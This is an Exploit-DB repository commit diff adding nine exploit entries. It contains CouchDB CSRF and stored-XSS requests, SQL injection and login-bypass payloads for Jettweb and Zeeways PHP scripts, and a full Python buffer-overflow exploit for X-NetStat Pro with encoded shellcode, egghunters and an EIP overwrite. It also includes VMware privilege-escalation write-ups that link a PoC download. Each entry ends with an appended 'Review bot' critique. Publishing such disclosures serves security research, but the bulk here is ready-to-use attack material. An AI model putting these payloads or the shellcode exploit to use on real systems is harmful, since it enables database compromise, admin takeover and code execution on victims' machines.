DB: 2019-03-26

9 changes to exploits/shellcodes

X-NetStat Pro 5.63 - Local Buffer Overflow
VMware Workstation 14.1.5 / VMware Player 15.0.2 - Host VMX Process Impersonation Hijack Privilege Escalation
VMware Workstation 14.1.5 / VMware Player 15 - Host VMX Process COM Class Hijack Privilege Escalation
Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting
Jettweb PHP Hazır Haber Sitesi Scripti V1 - SQL Injection
Jettweb PHP Hazır Haber Sitesi Scripti V2 - SQL Injection (Authentication Bypass)
Jettweb PHP Hazır Haber Sitesi Scripti V3 - SQL Injection
Zeeways Jobsite CMS - 'id' SQL Injection
Zeeways Matrimony CMS - SQL Injection
This commit is contained in:
Offensive Security 2019-03-26 05:02:04 +00:00
parent 70225061cc
commit b5bccf8f35
10 changed files with 549 additions and 0 deletions

@ -0,0 +1,164 @@
##################################################################################################################################
# Exploit Title: Apache CouchDB 2.3.1 | Cross-Site Request Forgery /
Cross-Site Scripting
# Date: 22.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.1
##################################################################################################################################
Introduction
A CouchDB server hosts named databases, which store documents. Each
document is uniquely named in the database, and CouchDB provides a RESTful
HTTP API for reading and updating (add, edit, delete) database documents.
#################################################################################
Vulnerabilities: CSRF | XSS DOM Based & Reflected & Stored
#################################################################################
CSRF1
Create Database
PUT /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 27
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
{"id":"test","name":"test"}
#################################################################################
CSRF2
Delete Database
DELETE /test HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0
#################################################################################
CSRF3
Create Document
POST /test/ HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 18
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
{"testdoc":"test"}
#################################################################################
CSRF4
Create Admin
PUT /_node/couchdb@localhost/_config/admins/admin HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 10
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0
"password"
#################################################################################
CSRF5 & XSS1 | DOM Based & Stored - Add Option
PUT /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
Content-Length: 6
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0
"test"
#################################################################################
CSRF6 & XSS2 | DOM Based & Stored - Delete Option
DELETE /_node/couchdb@localhost/_config/test/%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
HTTP/1.1
Host: 127.0.0.1:5984
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:5984/_utils/
content-type: application/json
pragma: no-cache
Origin: http://127.0.0.1:5984
DNT: 1
Connection: close
Cookie: _ga=GA1.1.781615969.1550605249
Cache-Control: max-age=0
#################################################################################
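Review bot: the CSRF claims (CSRF1 to CSRF4) are not supported by the requests as shown. Each carries `Content-Type: application/json`, and CSRF1/CSRF3 add `X-Requested-With: XMLHttpRequest`; a page on another origin cannot send those headers without a CORS preflight, and the only cookie in any request is the analytics cookie `_ga`, not a CouchDB session credential. The advisory should state the precondition it relies on (a server with no admin configured, so unauthenticated requests are accepted, or a CORS configuration that admits the attacking origin), because that is what a defender needs to judge exposure. For XSS1/XSS2 it should say where the `_config/test/<img ...>` key is rendered (the `Referer: http://127.0.0.1:5984/_utils/` points at the Fauxton UI) and name the fix, escaping config keys in that view, alongside the operational mitigation of keeping the HTTP interface bound to localhost. Minor: the `User-Agent` values and the `PUT /_node/...` and `DELETE /_node/...` request lines are wrapped mid-header, which breaks copy-paste reproduction.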

@ -0,0 +1,46 @@
# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V1 - Multiple Vulnerabilities
# Date: 23.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-5-php-hazir-haber-sitesi-scripti-v1.html
# Demo Site: http://haberv1.proemlaksitesi.net
# Version: V1
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/gallery.php?gallery_id=1
Vulnerable Parameter: gallery_id (GET)
Payload: gallery_id=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x63565549564d5a424e57746d6d62614e4f6e4a7559666a744d50557776636e4e6a6952504d494444,0x71626a7a71)--
UsCA
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/haberarsiv.php?cid=1
Vulnerable Parameter: cid (POST)
Payload: cid=1' UNION ALL SELECT
CONCAT(0x7162707a71,0x506a594d7a4f6c64674249466d746d6c5751486e786745667369685263624c6445654f665a4f4146,0x7162706a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
ihPG
----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/arama.php?T1=btnVote=G%C3%B6nder&ara=1
Vulnerable Parameter: poll (POST)
Payload:
1&option=2&poll=-1'%20OR%203*2*1=6%20AND%20000889=000889%20--%20&stage=
----- PoC 4: SQLi -----
Request: http://localhost/[PATH]/uyelik.php
Vulnerable Parameter: option (POST)
Payload:
btnVote=G%C3%B6nder&option=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&poll=1&stage=2
----- PoC 5: Authentication Bypass -----
Administration Panel: http://localhost/[PATH]/yonetim/admingiris.php
Username: '=' 'or'
Password: '=' 'or'
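Review bot: the request method and the declared vulnerable parameter disagree in PoC 2, 3 and 4. PoC 2 shows `haberarsiv.php?cid=1` in the query string but labels `cid (POST)`; PoC 3 and 4 label `poll (POST)` and `option (POST)` while their `Request:` lines are GET URLs that do not carry those parameters at all, so a reader cannot tell which endpoint each payload belongs to. Give each PoC the full request (method, path and the body the payload sits in). The trailing `UsCA` and `ihPG` lines are wrapped tails of the `-- ` comment in the lines above them. The file title says `Multiple Vulnerabilities` while the csv entry says only `SQL Injection`; the PoC 5 login bypass (`'=' 'or'` in both fields) is itself SQL injection in `admingiris.php`, so the title should say so. No vendor notification or fix status is recorded, which is what a defender needs to know whether a patched release exists.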

@ -0,0 +1,14 @@
# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V2 - Authentication Bypass
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-6-php-hazir-haber-sitesi-scripti-v2.html
# Demo Site: http://haberv2.proemlaksitesi.net
# Version: V2
# Tested on: Kali Linux
# CVE: N/A
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/[PATH]/yonetim/admingiris.php
Username: '=' 'or'
Password: '=' 'or'
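Review bot: the entry records no disclosure timeline, vendor response or fixed version, so it cannot be used to decide whether a later release of the script is affected; the header should at least say whether the vendor was contacted. The `'=' 'or'` username/password pair is an SQL-injection login bypass, which the csv description `SQL Injection (Authentication Bypass)` reflects but the file title `Authentication Bypass` does not; align the two. The fix is the same one that applies to V1 and V3: bind the submitted credentials as query parameters in `admingiris.php` and compare against a stored password hash instead of building the login SQL from the raw input.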

@ -0,0 +1,47 @@
# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V3 - Multiple Vulnerabilities
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-16-php-hazir-haber-sitesi-scripti-v3.html
# Demo Site: http://haberv3.proemlaksitesi.net
# Version: V3
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/fonksiyonlar.php
Vulnerable Parameter: videoid (GET)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/kelimeara
Vulnerable Parameter: kelime (POST)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb
----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/datagetir.php
Vulnerable Parameter: q (GET)
Payload:
datagetir.php?deger=undefined&dog=undefined&komut=ilcegetir&q=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&son=undefined
----- PoC 4: SQLi -----
Request: http://localhost/[PATH]kelimeara
Vulnerable Parameter: kelime (POST)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb
----- PoC 5: Authentication Bypass -----
Administration Panel: http://localhost/[PATH]/yonetim/login.php
Username: '=' 'or'
Password: '=' 'or'
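Review bot: PoC 2 and PoC 4 are copy-paste duplicates of each other and of PoC 1's payload. Both claim `kelime (POST)` at `kelimeara`, but the payload shown is `fgit=videoyorumlar&videoid=1' UNION ...`, i.e. the `videoid` injection from PoC 1, and the PoC 4 request `http://localhost/[PATH]kelimeara` is missing the slash after `[PATH]`. Either supply the real `kelime` request and payload for PoC 2 and drop PoC 4, or remove both; as written, a defender checking whether `kelimeara` is affected has nothing to verify against. The `Kcmb` lines are wrapped tails of the `-- ` comment above them. As with V1 and V2, no fix status is recorded.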

@ -0,0 +1,32 @@
# Exploit Title: Zeeways Jobsite CMS - 'id' SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.zeeways.com/jobsite-cms/1/productdetail
# Demo Site: http://www.zeewayscms.com/jobsite/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/news_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/jobs_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#
----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/job_cmp_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#
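Review bot: `# Version: Lastest` is both a typo and not a version; record the release number, or at least the date the demo site was tested, otherwise nobody can tell whether a given install is affected. The three PoCs are the same error-based payload (`GROUP BY CONCAT(...,FLOOR(RAND(0)*2)) HAVING MIN(0)#`) against three pages that take `id`. Listing all three is fine, but the entry should say the root cause is shared: the leading `-5236"` shows `id` is dropped into a double-quoted SQL literal unescaped, so one fix, casting `id` to an integer or binding it as a parameter, covers `news_details.php`, `jobs_details.php` and `job_cmp_details.php` together.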

@ -0,0 +1,33 @@
# Exploit Title: Zeeways Matrimony CMS - SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.zeeways.com/matrimony-cms/4/productdetail
# Demo Site: http://www.zeewayscms.com/matrimony/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/profile_list
Vulnerable Parameter: up_cast (POST)
Payload: (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(117),CHAR(82),CHAR(120),CHAR(106),CHAR(69),CHAR(48),CHAR(117),CHAR(107)),floor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))
----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/profile_list
Vulnerable Parameter: s_mother (GET)
Payload: (select 1 and row(1%2C1)>(select
count(*)%2Cconcat(concat(CHAR(52)%2CCHAR(67)%2CCHAR(117)%2CCHAR(113)%2CCHAR(82)%2CCHAR(106)%2CCHAR(97)%2CCHAR(51)%2CCHAR(113)%2CCHAR(122)%2CCHAR(116))%2Cfloor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))
----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/profile_list?s_mother=1
Vulnerable Parameter: s_religion (POST)
Payload: (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(50),CHAR(86),CHAR(74),CHAR(77),CHAR(54),CHAR(109),CHAR(84),CHAR(73)),floor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))
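Review bot: the parameter labels and request lines conflict. PoC 2 declares `s_mother (GET)` but its `Request:` is `profile_list` with no query string, while PoC 3 declares `s_religion (POST)` yet its request shows `?s_mother=1` in the URL. PoC 1 and PoC 3 are the same `row(1,1)>(select count(*),concat(...,floor(rand()*2))x ... group by x)` payload, and PoC 2 is the same again with `%2C` in place of the commas, so the three differ only in which parameter they are claimed against; give each its exact method and body so the claim can be checked. The `CHAR(...)` chains only build an arbitrary marker string and are not values the vulnerability depends on, which is worth one sentence so readers do not treat them as required. `# Version: Lastest` is a typo and not a version.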

exploits/windows/local/46596.py Executable file
@ -0,0 +1,133 @@
#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------------#
# Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter) #
# Date: 2019-03-23 #
# Author: Peyman Forouzan #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
# Vendor Homepage: https://freshsoftware.com #
# Software Download : https://www.freshsoftware.com/files/xns56p_setup.exe #
# Version: 5.63 #
# Special Thanks to my wife #
# The program has Local Buffer Overflow in several places. #
# Note: Although there are even more simple codes to this vulnerability, #
# this technique (EggHunter) has been used to run vulnerability in different windows versions. #
# Steps : #
# 1- Run python code : X-NetStat.py ( Three files are created ) #
# 2- App --> Tools --> HTTP Client --> paste in contents from the egg.txt into "URL" #
# --> Enter --> Close HTTP Client window. #
# 3- Rules --> Add New Rule --> Actions --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depend on your windows version) into "Run Program" --> Ok #
# --> Wait a litle --> Shellcode (Calc) open #
# Also Instead of the third stage you can : #
# File --> Import / Resolve bulk IP List ... --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depend on your windows version) into "IP List (One IP per Line)" --> #
# Then Press Open file (Folder) Icon --> Wait a litle --> Shellcode (Calc) open #
#---------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite #
#---------------------------------------------------------------------------------------------------------#
#------------------------------------ EGG Shellcode Generation ---------------------------------------
#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
# ( Can be replaced with Shellcode )
egg = "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"
f = open ("egg.txt", "w")
f.write(egg)
f.close()
#--------------------------------- EGG Hunter Shellcode Generation -----------------------------------
#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters
# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
egghunter = "\x4c\x4c\x4c\x4c\x5f"
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47"
egghunter += "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41"
egghunter += "\x47\x75\x4a\x49\x56\x51\x6b\x62\x75\x36\x4e\x6c"
egghunter += "\x48\x4b\x6b\x30\x59\x6b\x34\x63\x64\x35\x33\x38"
egghunter += "\x45\x61\x49\x4b\x36\x33\x50\x53\x70\x53\x43\x63"
egghunter += "\x38\x33\x6f\x30\x43\x56\x4e\x61\x48\x4a\x79\x6f"
egghunter += "\x44\x4f\x30\x42\x72\x72\x6b\x30\x59\x6b\x39\x50"
egghunter += "\x30\x74\x67\x78\x52\x4a\x77\x72\x50\x58\x48\x4d"
egghunter += "\x56\x4e\x71\x4a\x7a\x4b\x35\x42\x70\x6a\x67\x56"
egghunter += "\x42\x78\x56\x51\x6b\x79\x6f\x79\x68\x62\x72\x44"
egghunter += "\x59\x6f\x67\x63\x62\x7a\x6b\x33\x45\x6c\x57\x54"
egghunter += "\x75\x50\x62\x54\x67\x71\x31\x4a\x75\x6c\x67\x75"
egghunter += "\x74\x34\x38\x56\x4f\x48\x44\x37\x30\x30\x74\x70"
egghunter += "\x31\x64\x6c\x49\x4a\x77\x6e\x4f\x64\x35\x68\x51"
egghunter += "\x6c\x6f\x33\x45\x48\x4e\x59\x6f\x6d\x37\x41\x41"
# EggHunter - Modified Version for Windows10 (32-64 bit)
egghunter10 = "\x4c\x4c\x4c\x4c\x5f"
egghunter10 += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
egghunter10 += "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51"
egghunter10 += "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42"
egghunter10 += "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a"
egghunter10 += "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50"
egghunter10 += "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55"
egghunter10 += "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50"
egghunter10 += "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55"
egghunter10 += "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76"
egghunter10 += "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50"
egghunter10 += "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31"
egghunter10 += "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d"
egghunter10 += "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58"
egghunter10 += "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a"
egghunter10 += "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31"
egghunter10 += "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71"
egghunter10 += "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f"
egghunter10 += "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55"
egghunter10 += "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57"
egghunter10 += "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c"
egghunter10 += "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c"
egghunter10 += "\x6b\x4f\x68\x67\x41\x41"
eip = "\x77\x5a\x46"
buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip # Direct Eip Overflow
f = open ("egghunter-winxp-win7.txt", "w")
f.write(buffer)
f.close()
buffer = egghunter10 + "\x41" * (264 - len(egghunter10)) + eip # Direct Eip Overflow
f2 = open ("egghunter-win10.txt", "w")
f2.write(buffer)
f2.close()
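Review bot: the three file writes should use `with open(...) as f:` so the handles are closed even if a write fails, and `#!/usr/bin/env python` should be pinned to `python2` or `python3` with the open mode chosen to match, because under Python 3 any `str` escape above `\x7f` would be UTF-8 encoded on write; here every byte in `egg`, `egghunter`, `egghunter10` and `eip` is printable ASCII so the output is identical either way, and a comment saying so would save the next reader the check. The comment `encode egghunter code produced by mona` records neither the mona command nor the original hunter bytes, so the two hunters cannot be regenerated or audited. `264` and the three-byte `eip` are unexplained magic numbers and belong in named constants with a comment on what they are. Header typos: `litle` (twice). For anyone adding input-length checks to this product, the header already names the three fields that accept the oversized input: the HTTP Client `URL` field, the rule `Run Program` field and the bulk `IP List` import.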

@ -0,0 +1,31 @@
VMware: Host VMX Process Impersonation Hijack EoP
Platform: VMware Workstation Windows v14.1.5 (on Windows 10). Also tested VMware Player 15.0.2.
Class: Elevation of Privilege
Summary: The creation of the VMX process on a Windows host can be hijacked leading to elevation of privilege.
Description: The VMX process (vmware-vmx.exe) process configures and hosts an instance of VM. As is common with desktop virtualization platforms the VM host usually has privileged access into the OS such as mapping physical memory which represents a security risk. To mitigate this the VMX process is created with an elevated integrity level by the authentication daemon (vmware-authd.exe) which runs at SYSTEM. This prevents a non-administrator user opening the process and abusing its elevated access.
Unfortunately the process is created as the desktop user and follows the common pattern of impersonating the user while calling CreateProcessAsUser. This is an issue as the user has the ability to replace any drive letter for themselves, which allows a non-admin user to hijack the path to the VMX executable, allowing the user to get arbitrary code running as a “trusted” VMX process. While having an elevated integrity level isnt especially dangerous, the fact that arbitrary code is running as a “trusted” VMX process means you can access all the facilities for setting up VMs, such as the “opensecurable” command which allows the process to open almost any file as SYSTEM for arbitrary read/write access which could easily be used to get administrator privileges. Write file write access you could perform an attack similar to https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html.
I reported the technique of hijacking process creation to Microsoft over 3 years ago (see https://bugs.chromium.org/p/project-zero/issues/detail?id=351). Unfortunately Microsoft declined to fix it at the time. This makes fixing this issue more difficult than it should be. You might think a a quick fix would be to not impersonate the user over the call to CreateProcessAsUser. However you can end up with other issues such as (https://bugs.chromium.org/p/project-zero/issues/detail?id=692). Also even if the user didnt hijack the main process creation they could instead hijack DLLs loaded by the VMX process once started.
A more comprehensive fix would to not create the process as the desktop user, instead using another user identity, however that in itself has risks and makes things considerably more complex.
Proof of Concept:
Ive provided a PoC as a C#/C++ project. The C# application will perform the hijack and get the C++ vmware-vmx process
1) Compile the project. It will need to grab the NtApiDotNet from NuGet to work.
2) Ensure the compiled output directory has the files HijackVMXProcess.exe, NtApiDotNet.dll and vmware-vmx.exe.
3) Run HijackVMXProcess.exe. If successful you should find that instead of the installed version of vmware-vmx the fake one is running. You can also specify a path to HijackVMXProcess and the fake vmware-vmx will demonstrate opening the file using the opensecurable command for write access.
Expected Result:
The VMX process created is the version provided by VMWare.
Observed Result:
The VMX process is a fake one provided by the PoC which allows access to secured commands.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46600.zip
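Review bot: typos in the Description that change the meaning: `Write file write access you could perform` should read `With file write access ...`, `a a quick fix` doubles a word, and `A more comprehensive fix would to not create` is missing `be`; apostrophes are dropped throughout (`isnt`, `didnt`, `Ive`). The heading `Proof of Concept:` appears twice, once before the numbered steps and once before the zip link; rename the second to something like `PoC download:`. The file has no vendor advisory, CVE or fixed-version reference, so anyone assessing Workstation 14.1.5 / Player 15.0.2 has nothing to check against. The write-up already names the root cause (CreateProcessAsUser called under impersonation while the user can remap drive letters); a one-line statement of the observable, a `vmware-vmx` instance that is not the installed binary, would make it directly usable by detection teams.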

@ -0,0 +1,40 @@
VMware: Host VMX Process COM Class Hijack EoP
Platform: VMware Workstation Windows v14.1.5 (on Windows 10). Also tested VMware Player 15.
Class: Elevation of Privilege
Summary: COM classes used by the VMX process on a Windows host can be hijacked leading to elevation of privilege.
Description: The VMX process (vmware-vmx.exe) process configures and hosts an instance of VM. As is common with desktop virtualization platforms the VM host usually has privileged access into the OS such as mapping physical memory which represents a security risk. To mitigate this the VMX process is created with an elevated integrity level by the authentication daemon (vmware-authd.exe) which runs at SYSTEM. This prevents a non-administrator user opening the process and abusing its elevated access.
Unfortunately the process is created as the desktop user which results in the elevated process sharing resources such as COM registrations with the normal user who can modify the registry to force an arbitrary DLL to be loaded into the VMX process.
The COM classes observed to be loaded by the VMX process, and thus can be hijacked by modifying the registry are as follows:
1b1cad8c-2dab-11d2-b604-00104b703efd Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject
7c857801-7381-11cf-884d-00aa004b2e24 PSFactoryBuffer
8bc3f05e-d86b-11d0-a075-00c04fb68820 Windows Management and Instrumentation
